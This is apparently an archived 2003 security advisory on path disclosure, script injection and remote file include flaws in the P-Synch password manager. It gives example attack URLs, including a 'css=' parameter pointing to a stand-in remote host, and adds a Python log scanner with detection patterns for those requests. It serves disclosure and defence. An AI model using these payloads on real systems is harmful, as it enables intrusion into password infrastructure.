Multiple Vulnerabilities In P-Synch Password Management

2003-05-30T00:00:00
ID SECURITYVULNS:DOC:4617
Type securityvulns
Reporter Securityvulns
Modified 2003-05-30T00:00:00

Description


The other night I came across a server running P-Synch. I had never heard of it, so I was curious to poke around on it a bit. Within an hour I found the vulns listed below. I'm pretty sure there are other, more serious vulns in P-Synch, but they are very picky about who they give their software to, even an evaluation version, so I was not able to test any further. However, I encourage any admins running P-Synch to poke around on it, just to be on the safe side.

Description


P-Synch Total Password Management Solution by M-TECH

P-Synch is a total password management solution. It is intended to reduce the cost of ownership of password systems, and simultaneously improve the security of password protected systems. This is done through:

- Password Synchronization.
- Enforcing an enterprise wide password strength policy.
- Allowing authenticated users to reset their own forgotten passwords and enable their locked out accounts.
- Streamlining help desk call resolution for password resets.

P-Synch is available for both internal use, on the corporate Intranet, as well as for the Internet deployment in B2B and B2C applications.

http://www.securityfocus.com/products/837

Problems


All of these problems are simple, self-explanatory vulns, so I'm sure the below examples will speak for themselves. Once again, this application was NOT thoroughly researched, so anyone with a copy of P-Synch might wanna explore it further.

Path Disclosure Vulnerability


https://path/to/psynch/nph-psa.exe?lang=

https://path/to/psynch/nph-psf.exe?lang=

Code Injection Vulnerability


https://path/to/psynch/nph-psf.exe?css=">[VBScript, JScript etc]

https://path/to/psynch/nph-psa.exe?css=">[VBScript, JScript etc]

File Include Vulnerability


https://path/to/psynch/nph-psf.exe?css=http://somesite/file

https://path/to/psynch/nph-psa.exe?css=http://somesite/file
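For admins reviewing a deployment, the three request patterns above can be searched for in web server access logs. The following is an added example, not part of the original advisory or of P-Synch: it assumes a common-log-format request field, and the `/psynch/` path, client addresses and parameter values in the sample lines are constructed.

```python
import re
from urllib.parse import parse_qs, urlsplit

# The two CGI endpoints named in the advisory.
ENDPOINTS = ("nph-psa.exe", "nph-psf.exe")
# Assumption: the log holds a quoted 'METHOD target HTTP/x.y' request field.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed sample log lines (not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [30/May/2003:10:00:00 +0000] "GET /psynch/nph-psa.exe?lang= HTTP/1.0" 200 512',
    '192.0.2.10 - - [30/May/2003:10:00:05 +0000] "GET /psynch/nph-psf.exe?css=%22%3E%3Cb%3Ex%3C/b%3E HTTP/1.0" 200 900',
    '192.0.2.11 - - [30/May/2003:10:01:00 +0000] "GET /psynch/nph-psa.exe?css=http://example.invalid/file HTTP/1.0" 200 900',
    '192.0.2.12 - - [30/May/2003:10:02:00 +0000] "GET /psynch/nph-psa.exe?lang=en-us&css=default.css HTTP/1.0" 200 900',
]

def classify(target):
    """Return the advisory findings a request target matches (may be empty)."""
    parts = urlsplit(target)
    if not parts.path.lower().endswith(ENDPOINTS):
        return []
    # parse_qs percent-decodes values; keep empty ones so 'lang=' is visible.
    params = parse_qs(parts.query, keep_blank_values=True)
    findings = []
    # Path disclosure: 'lang' supplied with an empty value.
    if any(value == "" for value in params.get("lang", [])):
        findings.append("path-disclosure")
    for css in params.get("css", []):
        # Code injection: characters that can close an attribute or open a tag.
        if re.search(r'["\'<>]', css):
            findings.append("code-injection")
        # File include: 'css' is an absolute or scheme-relative URL.
        if re.match(r'(?i)\s*(?:[a-z][a-z0-9+.-]*:)?//', css):
            findings.append("file-include")
    return findings

def scan(lines):
    """Return (line_number, findings) for every log line that matches."""
    hits = []
    for number, line in enumerate(lines, 1):
        match = REQUEST_RE.search(line)
        found = classify(match.group(1)) if match else []
        if found:
            hits.append((number, found))
    return hits

if __name__ == "__main__":
    for number, found in scan(SAMPLE_LOG):
        print(number, ", ".join(found))
```
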

Credits


All credits go to JeiAr of GulfTech Computers and CSA Security Research http://www.gulftech.org